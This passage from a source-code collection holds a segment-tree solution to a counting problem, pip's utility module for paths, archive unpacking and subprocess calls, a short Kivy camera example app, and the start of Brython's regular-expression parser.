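# Hedged sketch (not part of the original file): one possible implementation
# of the third approach from the problem statement above. A segment tree is
# built over the value range [0, 10000]; each node counts how many elements
# of A fall inside its interval, and a query sums the counts strictly below
# the queried value. Roughly O((n + k) lg V) for value range V.
class SegmentTreeSolution(object):
    VMAX = 10000

    def countOfSmallerNumber(self, A, queries):
        self.tree = [0] * (4 * (self.VMAX + 1))  # node -> count in interval
        for a in A:
            self._update(1, 0, self.VMAX, a)
        # count of elements < q == count of stored values in [0, q-1]
        return [self._query(1, 0, self.VMAX, q - 1) for q in queries]

    def _update(self, node, lo, hi, val):
        # walk from the root to the leaf for `val`, bumping every count
        self.tree[node] += 1
        if lo == hi:
            return
        mid = (lo + hi) // 2
        if val <= mid:
            self._update(2 * node, lo, mid, val)
        else:
            self._update(2 * node + 1, mid + 1, hi, val)

    def _query(self, node, lo, hi, ub):
        # number of stored values in [lo, hi] that are <= ub
        if ub < lo:
            return 0
        if hi <= ub:
            return self.tree[node]
        mid = (lo + hi) // 2
        return (self._query(2 * node, lo, mid, ub) +
                self._query(2 * node + 1, mid + 1, hi, ub))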
|
polyval/CNC
|
refs/heads/master
|
flask/Lib/site-packages/pip/utils/__init__.py
|
186
|
from __future__ import absolute_import
import contextlib
import errno
import locale
import logging
import re
import os
import posixpath
import shutil
import stat
import subprocess
import sys
import tarfile
import zipfile
from pip.exceptions import InstallationError
from pip.compat import console_to_str, stdlib_pkgs
from pip.locations import (
site_packages, user_site, running_under_virtualenv, virtualenv_no_global,
write_delete_marker_file,
)
from pip._vendor import pkg_resources
from pip._vendor.six.moves import input
from pip._vendor.six import PY2
from pip._vendor.retrying import retry
if PY2:
from io import BytesIO as StringIO
else:
from io import StringIO
__all__ = ['rmtree', 'display_path', 'backup_dir',
'ask', 'Inf', 'normalize_name', 'splitext',
'format_size', 'is_installable_dir',
'is_svn_page', 'file_contents',
'split_leading_dir', 'has_leading_dir',
'make_path_relative', 'normalize_path',
'renames', 'get_terminal_size', 'get_prog',
'unzip_file', 'untar_file', 'unpack_file', 'call_subprocess',
'captured_stdout', 'remove_tracebacks', 'ensure_dir',
'ARCHIVE_EXTENSIONS', 'SUPPORTED_EXTENSIONS',
'get_installed_version']
logger = logging.getLogger(__name__)
BZ2_EXTENSIONS = ('.tar.bz2', '.tbz')
ZIP_EXTENSIONS = ('.zip', '.whl')
TAR_EXTENSIONS = ('.tar.gz', '.tgz', '.tar')
ARCHIVE_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS
try:
import bz2 # noqa
SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + BZ2_EXTENSIONS + TAR_EXTENSIONS
except ImportError:
logger.debug('bz2 module is not available')
SUPPORTED_EXTENSIONS = ZIP_EXTENSIONS + TAR_EXTENSIONS
def import_or_raise(pkg_or_module_string, ExceptionType, *args, **kwargs):
try:
return __import__(pkg_or_module_string)
except ImportError:
raise ExceptionType(*args, **kwargs)
def ensure_dir(path):
"""os.path.makedirs without EEXIST."""
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def get_prog():
try:
if os.path.basename(sys.argv[0]) in ('__main__.py', '-c'):
return "%s -m pip" % sys.executable
except (AttributeError, TypeError, IndexError):
pass
return 'pip'
# Retry every half second for up to 3 seconds
@retry(stop_max_delay=3000, wait_fixed=500)
def rmtree(dir, ignore_errors=False):
shutil.rmtree(dir, ignore_errors=ignore_errors,
onerror=rmtree_errorhandler)
def rmtree_errorhandler(func, path, exc_info):
"""On Windows, the files in .svn are read-only, so when rmtree() tries to
remove them, an exception is thrown. We catch that here, remove the
read-only attribute, and hopefully continue without problems."""
# if file type currently read only
if os.stat(path).st_mode & stat.S_IREAD:
# convert to read/write
os.chmod(path, stat.S_IWRITE)
# use the original function to repeat the operation
func(path)
return
else:
raise
def display_path(path):
"""Gives the display value for a given path, making it relative to cwd
if possible."""
path = os.path.normcase(os.path.abspath(path))
if sys.version_info[0] == 2:
path = path.decode(sys.getfilesystemencoding(), 'replace')
path = path.encode(sys.getdefaultencoding(), 'replace')
if path.startswith(os.getcwd() + os.path.sep):
path = '.' + path[len(os.getcwd()):]
return path
def backup_dir(dir, ext='.bak'):
"""Figure out the name of a directory to back up the given dir to
(adding .bak, .bak2, etc)"""
n = 1
extension = ext
while os.path.exists(dir + extension):
n += 1
extension = ext + str(n)
return dir + extension
def ask_path_exists(message, options):
for action in os.environ.get('PIP_EXISTS_ACTION', '').split():
if action in options:
return action
return ask(message, options)
def ask(message, options):
"""Ask the message interactively, with the given possible responses"""
while 1:
if os.environ.get('PIP_NO_INPUT'):
raise Exception(
'No input was expected ($PIP_NO_INPUT set); question: %s' %
message
)
response = input(message)
response = response.strip().lower()
if response not in options:
print(
'Your response (%r) was not one of the expected responses: '
'%s' % (response, ', '.join(options))
)
else:
return response
class _Inf(object):
"""I am bigger than everything!"""
def __eq__(self, other):
if self is other:
return True
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __lt__(self, other):
return False
def __le__(self, other):
return False
def __gt__(self, other):
return True
def __ge__(self, other):
return True
def __repr__(self):
return 'Inf'
Inf = _Inf() # this object is not currently used as a sortable in our code
del _Inf
_normalize_re = re.compile(r'[^a-z]', re.I)
def normalize_name(name):
return _normalize_re.sub('-', name.lower())
def format_size(bytes):
if bytes > 1000 * 1000:
return '%.1fMB' % (bytes / 1000.0 / 1000)
elif bytes > 10 * 1000:
return '%ikB' % (bytes / 1000)
elif bytes > 1000:
return '%.1fkB' % (bytes / 1000.0)
else:
return '%ibytes' % bytes
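# Illustrative examples (derived from the thresholds above):
#   format_size(1234567) == '1.2MB'
#   format_size(56789)   == '56kB'
#   format_size(512)     == '512bytes'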
def is_installable_dir(path):
"""Return True if `path` is a directory containing a setup.py file."""
if not os.path.isdir(path):
return False
setup_py = os.path.join(path, 'setup.py')
if os.path.isfile(setup_py):
return True
return False
def is_svn_page(html):
"""
Returns true if the page appears to be the index page of an svn repository
"""
return (re.search(r'<title>[^<]*Revision \d+:', html) and
re.search(r'Powered by (?:<a[^>]*?>)?Subversion', html, re.I))
def file_contents(filename):
with open(filename, 'rb') as fp:
return fp.read().decode('utf-8')
def split_leading_dir(path):
path = str(path)
path = path.lstrip('/').lstrip('\\')
if '/' in path and (('\\' in path and path.find('/') < path.find('\\')) or
'\\' not in path):
return path.split('/', 1)
elif '\\' in path:
return path.split('\\', 1)
else:
return path, ''
def has_leading_dir(paths):
"""Returns true if all the paths have the same leading path name
(i.e., everything is in one subdirectory in an archive)"""
common_prefix = None
for path in paths:
prefix, rest = split_leading_dir(path)
if not prefix:
return False
elif common_prefix is None:
common_prefix = prefix
elif prefix != common_prefix:
return False
return True
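# Illustrative examples (derived from the logic above):
#   has_leading_dir(['pkg/setup.py', 'pkg/pkg/__init__.py'])  -> True
#   has_leading_dir(['setup.py', 'pkg/__init__.py'])          -> False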
def make_path_relative(path, rel_to):
"""
    Return a copy of `path` rewritten to be relative to the directory
    `rel_to`.
>>> make_path_relative('/usr/share/something/a-file.pth',
... '/usr/share/another-place/src/Directory')
'../../../something/a-file.pth'
>>> make_path_relative('/usr/share/something/a-file.pth',
... '/home/user/src/Directory')
'../../../usr/share/something/a-file.pth'
>>> make_path_relative('/usr/share/a-file.pth', '/usr/share/')
'a-file.pth'
"""
path_filename = os.path.basename(path)
path = os.path.dirname(path)
path = os.path.normpath(os.path.abspath(path))
rel_to = os.path.normpath(os.path.abspath(rel_to))
path_parts = path.strip(os.path.sep).split(os.path.sep)
rel_to_parts = rel_to.strip(os.path.sep).split(os.path.sep)
while path_parts and rel_to_parts and path_parts[0] == rel_to_parts[0]:
path_parts.pop(0)
rel_to_parts.pop(0)
full_parts = ['..'] * len(rel_to_parts) + path_parts + [path_filename]
if full_parts == ['']:
return '.' + os.path.sep
return os.path.sep.join(full_parts)
def normalize_path(path, resolve_symlinks=True):
"""
Convert a path to its canonical, case-normalized, absolute version.
"""
path = os.path.expanduser(path)
if resolve_symlinks:
path = os.path.realpath(path)
else:
path = os.path.abspath(path)
return os.path.normcase(path)
def splitext(path):
"""Like os.path.splitext, but take off .tar too"""
base, ext = posixpath.splitext(path)
if base.lower().endswith('.tar'):
ext = base[-4:] + ext
base = base[:-4]
return base, ext
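# Illustrative example: splitext('pip-7.0.0.tar.gz') == ('pip-7.0.0', '.tar.gz'),
# whereas os.path.splitext would give ('pip-7.0.0.tar', '.gz').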
def renames(old, new):
"""Like os.renames(), but handles renaming across devices."""
# Implementation borrowed from os.renames().
head, tail = os.path.split(new)
if head and tail and not os.path.exists(head):
os.makedirs(head)
shutil.move(old, new)
head, tail = os.path.split(old)
if head and tail:
try:
os.removedirs(head)
except OSError:
pass
def is_local(path):
"""
Return True if path is within sys.prefix, if we're running in a virtualenv.
If we're not in a virtualenv, all paths are considered "local."
"""
if not running_under_virtualenv():
return True
return normalize_path(path).startswith(normalize_path(sys.prefix))
def dist_is_local(dist):
"""
Return True if given Distribution object is installed locally
(i.e. within current virtualenv).
Always True if we're not in a virtualenv.
"""
return is_local(dist_location(dist))
def dist_in_usersite(dist):
"""
Return True if given Distribution is installed in user site.
"""
norm_path = normalize_path(dist_location(dist))
return norm_path.startswith(normalize_path(user_site))
def dist_in_site_packages(dist):
"""
Return True if given Distribution is installed in
distutils.sysconfig.get_python_lib().
"""
return normalize_path(
dist_location(dist)
).startswith(normalize_path(site_packages))
def dist_is_editable(dist):
"""Is distribution an editable install?"""
# TODO: factor out determining editableness out of FrozenRequirement
from pip import FrozenRequirement
req = FrozenRequirement.from_dist(dist, [])
return req.editable
def get_installed_distributions(local_only=True,
skip=stdlib_pkgs,
include_editables=True,
editables_only=False,
user_only=False):
"""
Return a list of installed Distribution objects.
If ``local_only`` is True (default), only return installations
local to the current virtualenv, if in a virtualenv.
``skip`` argument is an iterable of lower-case project names to
ignore; defaults to stdlib_pkgs
If ``editables`` is False, don't report editables.
If ``editables_only`` is True , only report editables.
If ``user_only`` is True , only report installations in the user
site directory.
"""
if local_only:
local_test = dist_is_local
else:
def local_test(d):
return True
if include_editables:
def editable_test(d):
return True
else:
def editable_test(d):
return not dist_is_editable(d)
if editables_only:
def editables_only_test(d):
return dist_is_editable(d)
else:
def editables_only_test(d):
return True
if user_only:
user_test = dist_in_usersite
else:
def user_test(d):
return True
return [d for d in pkg_resources.working_set
if local_test(d) and
d.key not in skip and
editable_test(d) and
editables_only_test(d) and
user_test(d)
]
def egg_link_path(dist):
"""
Return the path for the .egg-link file if it exists, otherwise, None.
    There are 3 scenarios:
1) not in a virtualenv
try to find in site.USER_SITE, then site_packages
2) in a no-global virtualenv
try to find in site_packages
3) in a yes-global virtualenv
try to find in site_packages, then site.USER_SITE
(don't look in global location)
For #1 and #3, there could be odd cases, where there's an egg-link in 2
locations.
This method will just return the first one found.
"""
sites = []
if running_under_virtualenv():
if virtualenv_no_global():
sites.append(site_packages)
else:
sites.append(site_packages)
if user_site:
sites.append(user_site)
else:
if user_site:
sites.append(user_site)
sites.append(site_packages)
for site in sites:
egglink = os.path.join(site, dist.project_name) + '.egg-link'
if os.path.isfile(egglink):
return egglink
def dist_location(dist):
"""
Get the site-packages location of this distribution. Generally
this is dist.location, except in the case of develop-installed
packages, where dist.location is the source code location, and we
want to know where the egg-link file is.
"""
egg_link = egg_link_path(dist)
if egg_link:
return egg_link
return dist.location
def get_terminal_size():
"""Returns a tuple (x, y) representing the width(x) and the height(x)
in characters of the terminal window."""
def ioctl_GWINSZ(fd):
try:
import fcntl
import termios
import struct
cr = struct.unpack(
'hh',
fcntl.ioctl(fd, termios.TIOCGWINSZ, '1234')
)
except:
return None
if cr == (0, 0):
return None
return cr
cr = ioctl_GWINSZ(0) or ioctl_GWINSZ(1) or ioctl_GWINSZ(2)
if not cr:
try:
fd = os.open(os.ctermid(), os.O_RDONLY)
cr = ioctl_GWINSZ(fd)
os.close(fd)
except:
pass
if not cr:
cr = (os.environ.get('LINES', 25), os.environ.get('COLUMNS', 80))
return int(cr[1]), int(cr[0])
def current_umask():
"""Get the current umask which involves having to set it temporarily."""
mask = os.umask(0)
os.umask(mask)
return mask
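# e.g. with a process umask of 0o022 this returns 0o022; the umask is set to
# 0 and immediately restored, so the process state is left unchanged.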
def unzip_file(filename, location, flatten=True):
"""
Unzip the file (with path `filename`) to the destination `location`. All
files are written based on system defaults and umask (i.e. permissions are
not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
ensure_dir(location)
zipfp = open(filename, 'rb')
try:
zip = zipfile.ZipFile(zipfp, allowZip64=True)
leading = has_leading_dir(zip.namelist()) and flatten
for info in zip.infolist():
name = info.filename
data = zip.read(name)
fn = name
if leading:
fn = split_leading_dir(name)[1]
fn = os.path.join(location, fn)
dir = os.path.dirname(fn)
if fn.endswith('/') or fn.endswith('\\'):
# A directory
ensure_dir(fn)
else:
ensure_dir(dir)
fp = open(fn, 'wb')
try:
fp.write(data)
finally:
fp.close()
mode = info.external_attr >> 16
# if mode and regular file and any execute permissions for
# user/group/world?
if mode and stat.S_ISREG(mode) and mode & 0o111:
# make dest file have execute for user/group/world
# (chmod +x) no-op on windows per python docs
os.chmod(fn, (0o777 - current_umask() | 0o111))
finally:
zipfp.close()
def untar_file(filename, location):
"""
Untar the file (with path `filename`) to the destination `location`.
All files are written based on system defaults and umask (i.e. permissions
are not preserved), except that regular file members with any execute
permissions (user, group, or world) have "chmod +x" applied after being
written. Note that for windows, any execute changes using os.chmod are
no-ops per the python docs.
"""
ensure_dir(location)
if filename.lower().endswith('.gz') or filename.lower().endswith('.tgz'):
mode = 'r:gz'
elif filename.lower().endswith(BZ2_EXTENSIONS):
mode = 'r:bz2'
elif filename.lower().endswith('.tar'):
mode = 'r'
else:
logger.warning(
'Cannot determine compression type for file %s', filename,
)
mode = 'r:*'
tar = tarfile.open(filename, mode)
try:
# note: python<=2.5 doesn't seem to know about pax headers, filter them
leading = has_leading_dir([
member.name for member in tar.getmembers()
if member.name != 'pax_global_header'
])
for member in tar.getmembers():
fn = member.name
if fn == 'pax_global_header':
continue
if leading:
fn = split_leading_dir(fn)[1]
path = os.path.join(location, fn)
if member.isdir():
ensure_dir(path)
elif member.issym():
try:
tar._extract_member(member, path)
except Exception as exc:
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warning(
'In the tar file %s the member %s is invalid: %s',
filename, member.name, exc,
)
continue
else:
try:
fp = tar.extractfile(member)
except (KeyError, AttributeError) as exc:
# Some corrupt tar files seem to produce this
# (specifically bad symlinks)
logger.warning(
'In the tar file %s the member %s is invalid: %s',
filename, member.name, exc,
)
continue
ensure_dir(os.path.dirname(path))
destfp = open(path, 'wb')
try:
shutil.copyfileobj(fp, destfp)
finally:
destfp.close()
fp.close()
                # does the member have any execute permissions for
                # user/group/world?
if member.mode & 0o111:
# make dest file have execute for user/group/world
# no-op on windows per python docs
os.chmod(path, (0o777 - current_umask() | 0o111))
finally:
tar.close()
def unpack_file(filename, location, content_type, link):
filename = os.path.realpath(filename)
if (content_type == 'application/zip' or
filename.lower().endswith(ZIP_EXTENSIONS) or
zipfile.is_zipfile(filename)):
unzip_file(
filename,
location,
flatten=not filename.endswith('.whl')
)
elif (content_type == 'application/x-gzip' or
tarfile.is_tarfile(filename) or
filename.lower().endswith(TAR_EXTENSIONS + BZ2_EXTENSIONS)):
untar_file(filename, location)
elif (content_type and content_type.startswith('text/html') and
is_svn_page(file_contents(filename))):
# We don't really care about this
from pip.vcs.subversion import Subversion
Subversion('svn+' + link.url).unpack(location)
else:
# FIXME: handle?
# FIXME: magic signatures?
logger.critical(
'Cannot unpack file %s (downloaded from %s, content-type: %s); '
'cannot detect archive format',
filename, location, content_type,
)
raise InstallationError(
'Cannot determine archive format of %s' % location
)
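# Hedged usage sketch (the paths below are placeholders, not documented pip
# behavior): unpack a downloaded sdist into a build directory. The `link`
# argument is only consulted for the svn-index-page case, so None is
# acceptable for plain archives.
def _unpack_file_example():
    unpack_file(
        '/tmp/example-1.0.tar.gz',  # hypothetical downloaded archive
        '/tmp/build/example',       # destination directory
        'application/x-gzip',       # content type reported by the server
        None,                       # no link: not an svn index page
    )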
def remove_tracebacks(output):
pattern = (r'(?:\W+File "(?:.*)", line (?:.*)\W+(?:.*)\W+\^\W+)?'
r'Syntax(?:Error|Warning): (?:.*)')
output = re.sub(pattern, '', output)
if PY2:
return output
# compileall.compile_dir() prints different messages to stdout
# in Python 3
return re.sub(r"\*\*\* Error compiling (?:.*)", '', output)
def call_subprocess(cmd, show_stdout=True, cwd=None,
raise_on_returncode=True,
command_level=logging.DEBUG, command_desc=None,
extra_environ=None):
if command_desc is None:
cmd_parts = []
for part in cmd:
if ' ' in part or '\n' in part or '"' in part or "'" in part:
part = '"%s"' % part.replace('"', '\\"')
cmd_parts.append(part)
command_desc = ' '.join(cmd_parts)
if show_stdout:
stdout = None
else:
stdout = subprocess.PIPE
logger.log(command_level, "Running command %s", command_desc)
env = os.environ.copy()
if extra_environ:
env.update(extra_environ)
try:
proc = subprocess.Popen(
cmd, stderr=subprocess.STDOUT, stdin=None, stdout=stdout,
cwd=cwd, env=env)
except Exception as exc:
logger.critical(
"Error %s while executing command %s", exc, command_desc,
)
raise
all_output = []
if stdout is not None:
while True:
line = console_to_str(proc.stdout.readline())
if not line:
break
line = line.rstrip()
all_output.append(line + '\n')
logger.debug(line)
if not all_output:
returned_stdout, returned_stderr = proc.communicate()
all_output = [returned_stdout or '']
proc.wait()
if proc.returncode:
if raise_on_returncode:
if all_output:
logger.info(
'Complete output from command %s:', command_desc,
)
logger.info(
''.join(all_output) +
'\n----------------------------------------'
)
raise InstallationError(
'Command "%s" failed with error code %s in %s'
% (command_desc, proc.returncode, cwd))
else:
logger.warning(
'Command "%s" had error code %s in %s',
command_desc, proc.returncode, cwd,
)
if stdout is not None:
return remove_tracebacks(''.join(all_output))
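# Hedged usage sketch (illustrative only). With show_stdout=False the child's
# output is captured and logged line by line at DEBUG level, then returned
# with SyntaxError/SyntaxWarning tracebacks stripped; a non-zero exit status
# raises InstallationError unless raise_on_returncode=False is passed.
def _call_subprocess_example():
    return call_subprocess(
        [sys.executable, '-c', 'print("hello from a child process")'],
        show_stdout=False,
    )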
def read_text_file(filename):
"""Return the contents of *filename*.
Try to decode the file contents with utf-8, the preferred system encoding
(e.g., cp1252 on some Windows machines), and latin1, in that order.
Decoding a byte string with latin1 will never raise an error. In the worst
case, the returned string will contain some garbage characters.
"""
with open(filename, 'rb') as fp:
data = fp.read()
encodings = ['utf-8', locale.getpreferredencoding(False), 'latin1']
for enc in encodings:
try:
data = data.decode(enc)
except UnicodeDecodeError:
continue
break
assert type(data) != bytes # Latin1 should have worked.
return data
def _make_build_dir(build_dir):
os.makedirs(build_dir)
write_delete_marker_file(build_dir)
class FakeFile(object):
"""Wrap a list of lines in an object with readline() to make
ConfigParser happy."""
def __init__(self, lines):
self._gen = (l for l in lines)
def readline(self):
try:
try:
return next(self._gen)
except NameError:
return self._gen.next()
except StopIteration:
return ''
def __iter__(self):
return self._gen
class StreamWrapper(StringIO):
@classmethod
def from_stream(cls, orig_stream):
cls.orig_stream = orig_stream
return cls()
# compileall.compile_dir() needs stdout.encoding to print to stdout
@property
def encoding(self):
return self.orig_stream.encoding
@contextlib.contextmanager
def captured_output(stream_name):
"""Return a context manager used by captured_stdout/stdin/stderr
that temporarily replaces the sys stream *stream_name* with a StringIO.
Taken from Lib/support/__init__.py in the CPython repo.
"""
orig_stdout = getattr(sys, stream_name)
setattr(sys, stream_name, StreamWrapper.from_stream(orig_stdout))
try:
yield getattr(sys, stream_name)
finally:
setattr(sys, stream_name, orig_stdout)
def captured_stdout():
"""Capture the output of sys.stdout:
with captured_stdout() as stdout:
print('hello')
self.assertEqual(stdout.getvalue(), 'hello\n')
Taken from Lib/support/__init__.py in the CPython repo.
"""
return captured_output('stdout')
class cached_property(object):
"""A property that is only computed once per instance and then replaces
itself with an ordinary attribute. Deleting the attribute resets the
property.
Source: https://github.com/bottlepy/bottle/blob/0.11.5/bottle.py#L175
"""
def __init__(self, func):
self.__doc__ = getattr(func, '__doc__')
self.func = func
def __get__(self, obj, cls):
if obj is None:
# We're being accessed from the class itself, not from an object
return self
value = obj.__dict__[self.func.__name__] = self.func(obj)
return value
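# Hedged usage sketch (illustrative class, not part of pip): the wrapped
# method runs once on the first attribute access, its result then shadows
# the descriptor in the instance __dict__, and `del obj.answer` re-arms it.
class _CachedPropertyExample(object):
    @cached_property
    def answer(self):
        print('computing...')  # printed only on the first access
        return 42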
def get_installed_version(dist_name):
"""Get the installed version of dist_name avoiding pkg_resources cache"""
# Create a requirement that we'll look for inside of setuptools.
req = pkg_resources.Requirement.parse(dist_name)
# We want to avoid having this cached, so we need to construct a new
# working set each time.
working_set = pkg_resources.WorkingSet()
# Get the installed distribution from our working set
dist = working_set.find(req)
# Check to see if we got an installed distribution or not, if we did
# we want to return it's version.
return dist.version if dist else None
|
aron-bordin/kivy
|
refs/heads/master
|
examples/camera/main.py
|
40
|
'''
Camera Example
==============
This example demonstrates a simple use of the camera. It shows a window with
a button labelled 'play' to turn the camera on and off. Note that
not finding a camera, perhaps because gstreamer is not installed, will
throw an exception during the kv language processing.
'''
# Uncomment these lines to see all the messages
#from kivy.logger import Logger
#import logging
#Logger.setLevel(logging.TRACE)
from kivy.app import App
from kivy.lang import Builder
kv = '''
BoxLayout:
orientation: 'vertical'
Camera:
id: camera
resolution: (640, 480)
play: False
ToggleButton:
text: 'Play'
on_press: camera.play = not camera.play
size_hint_y: None
height: '48dp'
'''
class TestCamera(App):
def build(self):
return Builder.load_string(kv)
if __name__ == '__main__':
    TestCamera().run()
|
HatsuneMiku0309/2014cdag10
|
refs/heads/master
|
wsgi/static/Brython2.1.0-20140419-113919/Lib/sre_parse.py
|
111
|
#
# Secret Labs' Regular Expression Engine
#
# convert re-style regular expression to sre pattern
#
# Copyright (c) 1998-2001 by Secret Labs AB. All rights reserved.
#
# See the sre.py file for information on usage and redistribution.
#
"""Internal support module for sre"""
# XXX: show string offset and offending character for all errors
import sys
from sre_constants import *
from _sre import MAXREPEAT
SPECIAL_CHARS = ".\\[{()*+?^$|"
REPEAT_CHARS = "*+?{"
DIGITS = set("0123456789")
OCTDIGITS = set("01234567")
HEXDIGITS = set("0123456789abcdefABCDEF")
WHITESPACE = set(" \t\n\r\v\f")
ESCAPES = {
r"\a": (LITERAL, ord("\a")),
r"\b": (LITERAL, ord("\b")),
r"\f": (LITERAL, ord("\f")),
r"\n": (LITERAL, ord("\n")),
r"\r": (LITERAL, ord("\r")),
r"\t": (LITERAL, ord("\t")),
r"\v": (LITERAL, ord("\v")),
r"\\": (LITERAL, ord("\\"))
}
CATEGORIES = {
r"\A": (AT, AT_BEGINNING_STRING), # start of string
r"\b": (AT, AT_BOUNDARY),
r"\B": (AT, AT_NON_BOUNDARY),
r"\d": (IN, [(CATEGORY, CATEGORY_DIGIT)]),
r"\D": (IN, [(CATEGORY, CATEGORY_NOT_DIGIT)]),
r"\s": (IN, [(CATEGORY, CATEGORY_SPACE)]),
r"\S": (IN, [(CATEGORY, CATEGORY_NOT_SPACE)]),
r"\w": (IN, [(CATEGORY, CATEGORY_WORD)]),
r"\W": (IN, [(CATEGORY, CATEGORY_NOT_WORD)]),
r"\Z": (AT, AT_END_STRING), # end of string
}
FLAGS = {
# standard flags
"i": SRE_FLAG_IGNORECASE,
"L": SRE_FLAG_LOCALE,
"m": SRE_FLAG_MULTILINE,
"s": SRE_FLAG_DOTALL,
"x": SRE_FLAG_VERBOSE,
# extensions
"a": SRE_FLAG_ASCII,
"t": SRE_FLAG_TEMPLATE,
"u": SRE_FLAG_UNICODE,
}
class Pattern:
# master pattern object. keeps track of global attributes
def __init__(self):
self.flags = 0
self.open = []
self.groups = 1
self.groupdict = {}
def opengroup(self, name=None):
gid = self.groups
self.groups = gid + 1
if name is not None:
ogid = self.groupdict.get(name, None)
if ogid is not None:
raise error("redefinition of group name %s as group %d; "
"was group %d" % (repr(name), gid, ogid))
self.groupdict[name] = gid
self.open.append(gid)
return gid
def closegroup(self, gid):
self.open.remove(gid)
def checkgroup(self, gid):
return gid < self.groups and gid not in self.open
class SubPattern:
# a subpattern, in intermediate form
def __init__(self, pattern, data=None):
self.pattern = pattern
if data is None:
data = []
self.data = data
self.width = None
def __iter__(self):
return iter(self.data)
def dump(self, level=0):
nl = 1
seqtypes = (tuple, list)
for op, av in self.data:
print(level*" " + op, end=' '); nl = 0
if op == "in":
# member sublanguage
print(); nl = 1
for op, a in av:
print((level+1)*" " + op, a)
elif op == "branch":
print(); nl = 1
i = 0
for a in av[1]:
if i > 0:
print(level*" " + "or")
a.dump(level+1); nl = 1
i = i + 1
elif isinstance(av, seqtypes):
for a in av:
if isinstance(a, SubPattern):
if not nl: print()
a.dump(level+1); nl = 1
else:
print(a, end=' ') ; nl = 0
else:
print(av, end=' ') ; nl = 0
if not nl: print()
def __repr__(self):
return repr(self.data)
def __len__(self):
return len(self.data)
def __delitem__(self, index):
del self.data[index]
def __getitem__(self, index):
if isinstance(index, slice):
return SubPattern(self.pattern, self.data[index])
return self.data[index]
def __setitem__(self, index, code):
self.data[index] = code
def insert(self, index, code):
self.data.insert(index, code)
def append(self, code):
self.data.append(code)
def getwidth(self):
# determine the width (min, max) for this subpattern
if self.width:
return self.width
lo = hi = 0
UNITCODES = (ANY, RANGE, IN, LITERAL, NOT_LITERAL, CATEGORY)
REPEATCODES = (MIN_REPEAT, MAX_REPEAT)
for op, av in self.data:
if op is BRANCH:
i = sys.maxsize
j = 0
for av in av[1]:
l, h = av.getwidth()
i = min(i, l)
j = max(j, h)
lo = lo + i
hi = hi + j
elif op is CALL:
i, j = av.getwidth()
lo = lo + i
hi = hi + j
elif op is SUBPATTERN:
i, j = av[1].getwidth()
lo = lo + i
hi = hi + j
elif op in REPEATCODES:
i, j = av[2].getwidth()
lo = lo + int(i) * av[0]
hi = hi + int(j) * av[1]
elif op in UNITCODES:
lo = lo + 1
hi = hi + 1
elif op == SUCCESS:
break
self.width = int(min(lo, sys.maxsize)), int(min(hi, sys.maxsize))
return self.width
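# Illustrative note: for the pattern "ab|c" the top-level subpattern's
# getwidth() is (1, 2) -- the shortest branch matches one character, the
# longest two.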
class Tokenizer:
def __init__(self, string):
self.istext = isinstance(string, str)
self.string = string
self.index = 0
self.__next()
def __next(self):
if self.index >= len(self.string):
self.next = None
return
char = self.string[self.index:self.index+1]
        # Special case for the str8, since indexing returns an integer
# XXX This is only needed for test_bug_926075 in test_re.py
if char and not self.istext:
char = chr(char[0])
if char == "\\":
try:
c = self.string[self.index + 1]
except IndexError:
raise error("bogus escape (end of line)")
if not self.istext:
c = chr(c)
char = char + c
self.index = self.index + len(char)
self.next = char
def match(self, char, skip=1):
if char == self.next:
if skip:
self.__next()
return 1
return 0
def get(self):
this = self.next
self.__next()
return this
def getwhile(self, n, charset):
result = ''
for _ in range(n):
c = self.next
if c not in charset:
break
result += c
self.__next()
return result
def tell(self):
return self.index, self.next
def seek(self, index):
self.index, self.next = index
def isident(char):
return "a" <= char <= "z" or "A" <= char <= "Z" or char == "_"
def isdigit(char):
return "0" <= char <= "9"
def isname(name):
# check that group name is a valid string
if not isident(name[0]):
return False
for char in name[1:]:
if not isident(char) and not isdigit(char):
return False
return True
def _class_escape(source, escape):
# handle escape code inside character class
code = ESCAPES.get(escape)
if code:
return code
code = CATEGORIES.get(escape)
if code and code[0] == IN:
return code
try:
c = escape[1:2]
if c == "x":
# hexadecimal escape (exactly two digits)
escape += source.getwhile(2, HEXDIGITS)
if len(escape) != 4:
raise ValueError
return LITERAL, int(escape[2:], 16) & 0xff
elif c == "u" and source.istext:
# unicode escape (exactly four digits)
escape += source.getwhile(4, HEXDIGITS)
if len(escape) != 6:
raise ValueError
return LITERAL, int(escape[2:], 16)
elif c == "U" and source.istext:
# unicode escape (exactly eight digits)
escape += source.getwhile(8, HEXDIGITS)
if len(escape) != 10:
raise ValueError
c = int(escape[2:], 16)
chr(c) # raise ValueError for invalid code
return LITERAL, c
elif c in OCTDIGITS:
# octal escape (up to three digits)
escape += source.getwhile(2, OCTDIGITS)
return LITERAL, int(escape[1:], 8) & 0xff
elif c in DIGITS:
raise ValueError
if len(escape) == 2:
return LITERAL, ord(escape[1])
except ValueError:
pass
raise error("bogus escape: %s" % repr(escape))
def _escape(source, escape, state):
# handle escape code in expression
code = CATEGORIES.get(escape)
if code:
return code
code = ESCAPES.get(escape)
if code:
return code
try:
c = escape[1:2]
if c == "x":
# hexadecimal escape
escape += source.getwhile(2, HEXDIGITS)
if len(escape) != 4:
raise ValueError
return LITERAL, int(escape[2:], 16) & 0xff
elif c == "u" and source.istext:
# unicode escape (exactly four digits)
escape += source.getwhile(4, HEXDIGITS)
if len(escape) != 6:
raise ValueError
return LITERAL, int(escape[2:], 16)
elif c == "U" and source.istext:
# unicode escape (exactly eight digits)
escape += source.getwhile(8, HEXDIGITS)
if len(escape) != 10:
raise ValueError
c = int(escape[2:], 16)
chr(c) # raise ValueError for invalid code
return LITERAL, c
elif c == "0":
# octal escape
escape += source.getwhile(2, OCTDIGITS)
return LITERAL, int(escape[1:], 8) & 0xff
elif c in DIGITS:
# octal escape *or* decimal group reference (sigh)
if source.next in DIGITS:
escape = escape + source.get()
if (escape[1] in OCTDIGITS and escape[2] in OCTDIGITS and
source.next in OCTDIGITS):
# got three octal digits; this is an octal escape
escape = escape + source.get()
return LITERAL, int(escape[1:], 8) & 0xff
# not an octal escape, so this is a group reference
group = int(escape[1:])
if group < state.groups:
if not state.checkgroup(group):
raise error("cannot refer to open group")
return GROUPREF, group
raise ValueError
if len(escape) == 2:
return LITERAL, ord(escape[1])
